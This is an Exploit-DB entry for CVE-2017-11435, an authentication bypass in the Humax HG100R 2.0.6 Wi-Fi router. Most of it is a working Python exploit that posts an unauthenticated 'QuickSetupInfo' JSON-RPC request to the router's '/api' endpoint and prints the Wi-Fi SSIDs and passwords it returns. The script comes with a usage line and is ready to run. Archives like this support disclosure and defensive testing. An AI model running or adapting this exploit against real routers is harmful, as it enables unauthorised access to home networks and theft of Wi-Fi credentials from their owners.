Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass

EDB-ID:

42732


Author:

Kivson

Type:

webapps


Platform:

Hardware

Date:

2017-09-14


# coding: utf-8

# Exploit Title: Humax HG100R-* Authentication Bypass
# Date: 14/09/2017
# Exploit Author: Kivson
# Vendor Homepage: http://humaxdigital.com
# Version: VER 2.0.6
# Tested on: OSX Linux
# CVE : CVE-2017-11435


# The Humax Wi-Fi Router model HG100R-* 2.0.6 is prone to an authentication bypass vulnerability via specially
# crafted requests to the management console. The bug is exploitable remotely when the router is configured to
# expose the management console.
# The router is not validating the session token while returning answers for some methods in url '/api'.
# An attacker can use this vulnerability to retrieve sensitive information such
# as private/public IP addresses, SSID names, and passwords.

import sys
import requests


def print_help():
    print('Exploit syntax error, Example:')
    print('python exploit.py http://192.168.0.1')


def exploit(host):
    print(f'Connecting to {host}')
    path = '/api'
    payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'

    response = requests.post(host + path, data=payload)
    response.raise_for_status()

    if 'result' not in response.json() or 'WiFi_Info' not in response.json()['result'] or 'wlan' not in \
            response.json()['result']['WiFi_Info']:
        print('Error, target may be no exploitable')
        return

    for wlan in response.json()['result']['WiFi_Info']['wlan']:
        print(f'Wifi data found:')
        print(f'    SSID: {wlan["ssid"]}')
        print(f'    PWD: {wlan["password"]}')


def main():
    if len(sys.argv) < 2:
        print_help()
        return
    host = sys.argv[1]
    exploit(host)


if __name__ == '__main__':
    main()